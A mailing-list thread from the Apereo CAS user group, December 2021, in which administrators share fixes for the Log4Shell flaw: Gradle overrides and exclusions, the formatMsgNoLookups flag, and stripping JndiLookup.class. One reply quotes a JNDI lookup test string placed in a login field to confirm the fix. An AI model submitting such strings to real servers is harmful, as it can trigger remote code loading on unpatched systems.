Re: [cas-user] log4j vulnerability remediation

[Baba Ndiaye]

Yes new update for cas-overlay-template

Le ven. 31 déc. 2021 à 07:12, Andy Ng  a écrit :

> And... 2.17.1 is out as well.
>
> On Tuesday, 21 December 2021 at 03:50:00 UTC+8 Pablo Vidaurri wrote:
>
>>
>> 2.17.0 is actually out now
>> On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:
>>
>>> Hi,
>>>
>>> You have to exclude log4j* from WEB-INF/lib form overlay plugin and add
>>> correct version as dependency( use 2.16.0 instead, a new CVE appeared on
>>> Tuesday)
>>> Regards,
>>>
>>> Le mar. 14 déc. 2021 à 17:02, apereo_cas_user  a
>>> écrit :
>>>
 We use cas 6.1.7  overlay template [still in pre-prod] for delegated
 authentication.
 As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and
 bounced tomcat.
 Is there a way we can exclude 2.12.1 from the build . [I can pull in
 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues
 when upgrading to 6.3.7.2

 Thanks

 --
 - Website: https://apereo.github.io/cas
 - Gitter Chatroom: https://gitter.im/apereo/cas
 - List Guidelines: https://goo.gl/1VRrw7
 - Contributions: https://goo.gl/mh7qDG
 ---
 You received this message because you are subscribed to the Google
 Groups "CAS Community" group.
 To unsubscribe from this group and stop receiving emails from it, send
 an email to cas-user+u...@apereo.org.

>>> To view this discussion on the web visit
 https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
 
 .

>>> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/5fb5c6d4-0a05-4f00-a4a1-a1afa89cce21n%40apereo.org
> 
> .
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAFu1ZRukRcZnJHGKtqp4OKU8%3DxV%3DGyROj6SGX3%2BHWx7ExQQKVA%40mail.gmail.com.

Re: [cas-user] log4j vulnerability remediation

[Andy Ng]

And... 2.17.1 is out as well.

On Tuesday, 21 December 2021 at 03:50:00 UTC+8 Pablo Vidaurri wrote:

>
> 2.17.0 is actually out now
> On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:
>
>> Hi,
>>
>> You have to exclude log4j* from WEB-INF/lib form overlay plugin and add 
>> correct version as dependency( use 2.16.0 instead, a new CVE appeared on 
>> Tuesday)
>> Regards,
>>
>> Le mar. 14 déc. 2021 à 17:02, apereo_cas_user  a 
>> écrit :
>>
>>> We use cas 6.1.7  overlay template [still in pre-prod] for delegated 
>>> authentication.
>>> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and 
>>> bounced tomcat.
>>> Is there a way we can exclude 2.12.1 from the build . [I can pull in 
>>> 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues 
>>> when upgrading to 6.3.7.2 
>>>
>>> Thanks
>>>
>>> -- 
>>> - Website: https://apereo.github.io/cas
>>> - Gitter Chatroom: https://gitter.im/apereo/cas
>>> - List Guidelines: https://goo.gl/1VRrw7
>>> - Contributions: https://goo.gl/mh7qDG
>>> --- 
>>> You received this message because you are subscribed to the Google 
>>> Groups "CAS Community" group.
>>> To unsubscribe from this group and stop receiving emails from it, send 
>>> an email to cas-user+u...@apereo.org.
>>>
>> To view this discussion on the web visit 
>>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
>>>  
>>> 
>>> .
>>>
>>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/5fb5c6d4-0a05-4f00-a4a1-a1afa89cce21n%40apereo.org.

Re: [cas-user] log4j vulnerability remediation

[Pablo Vidaurri]

2.17.0 is actually out now
On Thursday, December 16, 2021 at 2:27:13 PM UTC-6 Raph C wrote:

> Hi,
>
> You have to exclude log4j* from WEB-INF/lib form overlay plugin and add 
> correct version as dependency( use 2.16.0 instead, a new CVE appeared on 
> Tuesday)
> Regards,
>
> Le mar. 14 déc. 2021 à 17:02, apereo_cas_user  a 
> écrit :
>
>> We use cas 6.1.7  overlay template [still in pre-prod] for delegated 
>> authentication.
>> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and 
>> bounced tomcat.
>> Is there a way we can exclude 2.12.1 from the build . [I can pull in 
>> 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues 
>> when upgrading to 6.3.7.2 
>>
>> Thanks
>>
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>>
> To view this discussion on the web visit 
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
>>  
>> 
>> .
>>
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/d771419d-777f-4afc-b752-48b92620a13en%40apereo.org.

Re: [cas-user] log4j vulnerability remediation

[Raph C]

Hi,

You have to exclude log4j* from WEB-INF/lib form overlay plugin and add
correct version as dependency( use 2.16.0 instead, a new CVE appeared on
Tuesday)
Regards,

Le mar. 14 déc. 2021 à 17:02, apereo_cas_user  a
écrit :

> We use cas 6.1.7  overlay template [still in pre-prod] for delegated
> authentication.
> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and
> bounced tomcat.
> Is there a way we can exclude 2.12.1 from the build . [I can pull in
> 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues
> when upgrading to 6.3.7.2
>
> Thanks
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
> 
> .
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAJtMnTFH2iCfbQQMe31WtoJtCgatasTAw4TCZWBUx8tZLirSXg%40mail.gmail.com.

Re: [cas-user] log4j vulnerability remediation

[Joe Manavalan]

Thanks @ robertoschwald

That worked for me as well

build.gradle
---
dependencies {
compile "org.apache.logging.log4j:log4j-api:2.15.0"
compile "org.apache.logging.log4j:log4j-core:2.15.0"
compile "org.apache.logging.log4j:log4j-jcl:2.15.0"
compile "org.apache.logging.log4j:log4j-jul:2.15.0"
compile "org.apache.logging.log4j:log4j-web:2.15.0"
compile "org.apache.logging.log4j:log4j-slf4j18-impl:2.15.0"
}

bootWar {
entryCompression = ZipEntryCompression.STORED
overlays {
cas {
from "org.apereo.cas:cas-server-webapp${project.appServer}:${
casServerVersion}@war"
provided = false
excludes = ["WEB-INF/lib/log4j-*-2.12.1.jar"]
}
}
}

On Tuesday, December 14, 2021 at 10:41:32 AM UTC-6 robertoschwald wrote:

> We had the same problem and we did the following:
>
> 1. Overwrite BOM defined version in gradle.properties
>
> # BOM overwritten versions
> # CVE-2021-44228 critical fix in 2.15.0.
> # 2.16.0 further secures.
> # See https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4
> log4j2.version=2.16.0
>
> 2. add the dependencies to build.gradle
> We use a fairly old CAS Server, so we use these deps. Normally, you do not 
> have to state the ones which have no version, are taken with the version 
> you defined in log4j2.version variable, but we stated them explicitly, so 
> one knows what artifacts are affected.
>
> // Log4j2 critical security flaw fixed in 2.15.0
> compile "org.apache.logging.log4j:log4j-api"
> compile "org.apache.logging.log4j:log4j-core"
> compile "org.apache.logging.log4j:log4j-jcl:${project.'log4j2.version'}"
> compile "org.apache.logging.log4j:log4j-slf4j-impl"
> compile "org.apache.logging.log4j:log4j-web:${project.'log4j2.version’}"
>
> 3. Exclude the old dependencies from war-overlay
> This is an important step.
> As you get the dependencies from the original, overlayed war file, you 
> must exclude them in the war task, so only your versions are taken.
>
> war {
> ...
>   // exclusion list of all dependencies contained in the original cas-WAR 
> for which we use newer versions.
>   // You must exclude all of them, otherwise we get duplicate dependencies 
> in our cas.war !
>   // log4j2 insecure version remove. See above.
>   exclude "WEB-INF/lib/log4j-*-2.12.1.jar"
>   exclude "WEB-INF/lib/jul-to-slf4j-1.7.32.jar"
>   exclude "WEB-INF/lib/slf4j-api-1.7.32.jar"
> }
>
> Hope that helps.
>
>
>
> Am 14.12.2021 um 17:25 schrieb Jeffrey Ramsay :
>
> Same experience.
>
> On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user  
> wrote:
>
>> We use cas 6.1.7  overlay template [still in pre-prod] for delegated 
>> authentication.
>> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and 
>> bounced tomcat.
>> Is there a way we can exclude 2.12.1 from the build . [I can pull in 
>> 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues 
>> when upgrading to 6.3.7.2 
>>
>> Thanks
>>
>>
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>> To view this discussion on the web visit 
>> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
>>  
>> 
>> .
>>
>
> -- 
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> --- 
> You received this message because you are subscribed to the Google Groups 
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to cas-user+u...@apereo.org.
>
> To view this discussion on the web visit 
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CA%2BTBYOQ-AecysHAxD0FHEdBnTTHD3wNTa_d1xXcVVRmuC16A5g%40mail.gmail.com
>  
> 
> .
>
>
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 

Re: [cas-user] log4j vulnerability remediation

[Robert Oschwald]

We had the same problem and we did the following:

1. Overwrite BOM defined version in gradle.properties

# BOM overwritten versions
# CVE-2021-44228 critical fix in 2.15.0.
# 2.16.0 further secures.
# See https://lists.apache.org/thread/d6v4r6nosxysyq9rvnr779336yf0woz4
log4j2.version=2.16.0

2. add the dependencies to build.gradle
We use a fairly old CAS Server, so we use these deps. Normally, you do not have 
to state the ones which have no version, are taken with the version you defined 
in log4j2.version variable, but we stated them explicitly, so one knows what 
artifacts are affected.

// Log4j2 critical security flaw fixed in 2.15.0
compile "org.apache.logging.log4j:log4j-api"
compile "org.apache.logging.log4j:log4j-core"
compile "org.apache.logging.log4j:log4j-jcl:${project.'log4j2.version'}"
compile "org.apache.logging.log4j:log4j-slf4j-impl"
compile "org.apache.logging.log4j:log4j-web:${project.'log4j2.version’}"

3. Exclude the old dependencies from war-overlay
This is an important step.
As you get the dependencies from the original, overlayed war file, you must 
exclude them in the war task, so only your versions are taken.

war {
 ...
  // exclusion list of all dependencies contained in the original cas-WAR for 
which we use newer versions.
  // You must exclude all of them, otherwise we get duplicate dependencies in 
our cas.war !
  // log4j2 insecure version remove. See above.
  exclude "WEB-INF/lib/log4j-*-2.12.1.jar"
  exclude "WEB-INF/lib/jul-to-slf4j-1.7.32.jar"
  exclude "WEB-INF/lib/slf4j-api-1.7.32.jar"
}

Hope that helps.



> Am 14.12.2021 um 17:25 schrieb Jeffrey Ramsay :
> 
> Same experience.
> 
> On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user  > wrote:
> We use cas 6.1.7  overlay template [still in pre-prod] for delegated 
> authentication.
> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and bounced 
> tomcat.
> Is there a way we can exclude 2.12.1 from the build . [I can pull in 2.15.0 
> by adding in build.gradle but conflict with 2.12.1].  We have issues when 
> upgrading to 6.3.7.2 
> 
> Thanks
> 
> 
> -- 
> - Website: https://apereo.github.io/cas 
> - Gitter Chatroom: https://gitter.im/apereo/cas 
> - List Guidelines: https://goo.gl/1VRrw7 
> - Contributions: https://goo.gl/mh7qDG 
> --- 
> You received this message because you are subscribed to the Google Groups 
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to cas-user+unsubscr...@apereo.org 
> .
> To view this discussion on the web visit 
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
>  
> .
> 
> -- 
> - Website: https://apereo.github.io/cas 
> - Gitter Chatroom: https://gitter.im/apereo/cas 
> - List Guidelines: https://goo.gl/1VRrw7 
> - Contributions: https://goo.gl/mh7qDG 
> --- 
> You received this message because you are subscribed to the Google Groups 
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to cas-user+unsubscr...@apereo.org 
> .
> To view this discussion on the web visit 
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CA%2BTBYOQ-AecysHAxD0FHEdBnTTHD3wNTa_d1xXcVVRmuC16A5g%40mail.gmail.com
>  
> .

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/A6D22B3F-1993-4D04-A604-59DE522768B6%40gmail.com.

Re: [cas-user] log4j vulnerability remediation

[Jeffrey Ramsay]

Same experience.

On Tue, Dec 14, 2021 at 11:02 AM apereo_cas_user 
wrote:

> We use cas 6.1.7  overlay template [still in pre-prod] for delegated
> authentication.
> As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and
> bounced tomcat.
> Is there a way we can exclude 2.12.1 from the build . [I can pull in
> 2.15.0 by adding in build.gradle but conflict with 2.12.1].  We have issues
> when upgrading to 6.3.7.2
>
> Thanks
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org
> 
> .
>

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CA%2BTBYOQ-AecysHAxD0FHEdBnTTHD3wNTa_d1xXcVVRmuC16A5g%40mail.gmail.com.

[cas-user] log4j vulnerability remediation

[apereo_cas_user]

We use cas 6.1.7  overlay template [still in pre-prod] for delegated 
authentication.
As a temp solution we replaced log4j  2.12.1 with 2.15.0 manually and 
bounced tomcat.
Is there a way we can exclude 2.12.1 from the build . [I can pull in 2.15.0 
by adding in build.gradle but conflict with 2.12.1].  We have issues when 
upgrading to 6.3.7.2 

Thanks

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/affbd618-e1e6-427f-b333-e00ca54bf1aen%40apereo.org.

Re: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

[Anders Collstrup]

My fix was the following:

CAS 6.1 running on debian 10. All except CAS installed from standard repo's

created this file:
/usr/share/tomcat9/bin/setenv.sh

containing::
JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=True"

After restart of tomcat I could see the following in the log:
10-Dec-2021 18:49:18.681 INFO [main]
org.apache.catalina.startup.VersionLoggerListener.log Command line
argument: -Dlog4j2.formatMsgNoLookups=True

On Fri, Dec 10, 2021 at 9:01 PM King, Robert  wrote:

> Just rolled out this mitigation to our servers, seems to be effective for
> CAS 6.3.x builds.
>
>
>
> Our environment for reference:
>
>
>
> - Standalone Tomcat
>
> - OpenJDK
>
> - CAS and CAS-Management as deployed jars
>
> - CAS and CAS-Mangement built from cas-overlay and cas-management-overlay
> repos.
>
>
>
> Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat
> startup in systemd tomcat.service file.
>
>
>
>
>
> *From:* 'Richard Frovarp' via CAS Community 
> *Sent:* Friday, December 10, 2021 3:29 PM
> *To:* cas-user@apereo.org
> *Subject:* [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability
>
>
>
> Maybe? The one that I've seen
>
> https://logging.apache.org/log4j/2.x/security.html
>
>
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to
> your JVM and not in the config file.
>
>
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in
> the log4j2.xml config file might do to trick.
>
>
>
> I'm guessing we'd do that somewhere here at the top?
>
>
>
> 
> 
> 
> 
> /etc/cas/logs
> 
> 
>
>
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> cas-user@apereo.org> wrote:
>
> Using a new enough version of the JDK might also alleviate it? The other
> option is to throw the config option at the JDK to stop it from happening.
> That would seem to be easiest.
>
>
>
> On 12/10/21 12:36 PM, King, Robert wrote:
>
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>
>
>
> Has anyone attempted to mitigate this CVE yet?
>
>
>
> There seems to be two possible approaches to mitigation:
>
>
>
> 1 The sledgehammer approach of removing the JndiLookup.class from the jar
> files:
>
>
>
> zip –q –d log4j-core-*.jar
> org/apache/logging/log4j/core/lookup/JndiLookup.class
>
>
>
> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca
> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca?utm_medium=email_source=footer>
> .
>
>
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu
> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu?utm_medium=email_source=footer>
> .
>
> --
> - Website: https://apereo.github.io/cas
> - Gitter Chatroom: https://gitter.im/apereo/cas
> - List Guidelines: https://goo.gl/1VRrw7
> - Contributions: https://goo.gl/mh7qDG
> ---
> You received this message because you are subscribed to the Google Groups
> "CAS Community" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to cas-user+unsubscr...@apereo.org.
> To view this discussion on the web visit
> https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com
> <https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.g

RE: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

[King, Robert]

Just rolled out this mitigation to our servers, seems to be effective for CAS 
6.3.x builds.

Our environment for reference:

- Standalone Tomcat
- OpenJDK
- CAS and CAS-Management as deployed jars
- CAS and CAS-Mangement built from cas-overlay and cas-management-overlay repos.

Mitigated by adding “-Dlog4j2.FormatMsgNoLookups=true” into the Tomcat startup 
in systemd tomcat.service file.


From: 'Richard Frovarp' via CAS Community 
Sent: Friday, December 10, 2021 3:29 PM
To: cas-user@apereo.org
Subject: [EXTERNAL SENDER] Re: [cas-user] log4j vulnerability

Maybe? The one that I've seen
https://logging.apache.org/log4j/2.x/security.html

says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to your 
JVM and not in the config file.

On 12/10/21 12:55 PM, Mike Osterman wrote:
Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in the 
log4j2.xml config file might do to trick.

I'm guessing we'd do that somewhere here at the top?





/etc/cas/logs



On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community 
mailto:cas-user@apereo.org>> wrote:
Using a new enough version of the JDK might also alleviate it? The other option 
is to throw the config option at the JDK to stop it from happening. That would 
seem to be easiest.

On 12/10/21 12:36 PM, King, Robert wrote:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

Has anyone attempted to mitigate this CVE yet?

There seems to be two possible approaches to mitigation:

1 The sledgehammer approach of removing the JndiLookup.class from the jar files:

zip –q –d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

2. Rebuild CAS and set “log4jVersion=2.15.0”
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org<mailto:cas-user+unsubscr...@apereo.org>.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca<https://groups.google.com/a/apereo.org/d/msgid/cas-user/885973b3982643508efbf27a99855460%40mun.ca?utm_medium=email_source=footer>.


--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org<mailto:cas-user+unsubscr...@apereo.org>.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu<https://groups.google.com/a/apereo.org/d/msgid/cas-user/afcce42d-1ecd-1bd8-6598-ecba78b6e987%40ndsu.edu?utm_medium=email_source=footer>.
--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org<mailto:cas-user+unsubscr...@apereo.org>.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com<https://groups.google.com/a/apereo.org/d/msgid/cas-user/CAEdMQHUe7%2BfgzA2uQ2eWFe9O-a%3D9sOP4LBi9FviTvsEMYHtKsA%40mail.gmail.com?utm_medium=email_source=footer>.


--
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
---
You received this message because you are subscribed to the Google Groups "CAS 
Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to cas-user+unsubscr...@apereo.org<mailto:cas-user+unsubscr...@apereo.org>.
To view this discussion on the web visit 
https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu<https://groups.google.com/a/apereo.org/d/msgid/cas-user/67916862-8f31-e08c-1949-86a97958ba36%40ndsu.edu?utm_medium=email_source=footer>.

-- 
- Website: https://apereo.github.io/cas
- Gitter Chatroom: https://gitter.im/apereo/cas
- List Guidelines: https://goo.gl/1VRrw7
- Contributions: https://goo.gl/mh7qDG
--- 
You received this message because you are subscribed to the Google Groups "CAS 
Community&

Re: [cas-user] log4j vulnerability

[Adam Franco]

I've rebuilt CAS with log4j 2.15.0 and confirmed that doing so stopped 
outgoing connections when a line like 
${jndi:rmi://www.example.com:80/test}
was submitted in the username field (I used a real hostname rather than 
www.example.com).

We were able to verify this fix with tcpdump on the CAS node as well as 
border-firewall logging.
On Friday, December 10, 2021 at 1:59:00 PM UTC-5 richard.frovarp wrote:

> Maybe? The one that I've seen
> https://logging.apache.org/log4j/2.x/security.html
>
> says set it as a system property, so -Dlog4j2.formatMsgNoLookups=true to 
> your JVM and not in the config file.
>
> On 12/10/21 12:55 PM, Mike Osterman wrote:
>
> Yeah, it seems like setting the log4j2.formatMsgNoLookups to "true" in 
> the log4j2.xml config file might do to trick. 
>
> I'm guessing we'd do that somewhere here at the top?
>
> 
> 
> 
> 
> /etc/cas/logs
> 
> 
>
> On Fri, Dec 10, 2021 at 10:41 AM 'Richard Frovarp' via CAS Community <
> cas-...@apereo.org> wrote:
>
>> Using a new enough version of the JDK might also alleviate it? The other 
>> option is to throw the config option at the JDK to stop it from happening. 
>> That would seem to be easiest.
>>
>> On 12/10/21 12:36 PM, King, Robert wrote:
>>
>> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
>>
>>  
>>
>> Has anyone attempted to mitigate this CVE yet?
>>
>>  
>>
>> There seems to be two possible approaches to mitigation:
>>
>>  
>>
>> 1 The sledgehammer approach of removing the JndiLookup.class from the jar 
>> files:
>>
>>  
>>
>> zip –q –d log4j-core-*.jar 
>> org/apache/logging/log4j/core/lookup/JndiLookup.class
>>
>>  
>>
>> 2. Rebuild CAS and set “log4jVersion=2.15.0”
>> -- 
>> - Website: https://apereo.github.io/cas
>> - Gitter Chatroom: https://gitter.im/apereo/cas
>> - List Guidelines: https://goo.gl/1VRrw7
>> - Contributions: https://goo.gl/mh7qDG
>> --- 
>> You received this message because you are subscribed to the Google Groups 
>> "CAS Community" group.
>> To unsubscribe from this group and stop receiving emails from it, send an 
>> email to cas-user+u...@apereo.org.
>> To view this discussion on the web visit 
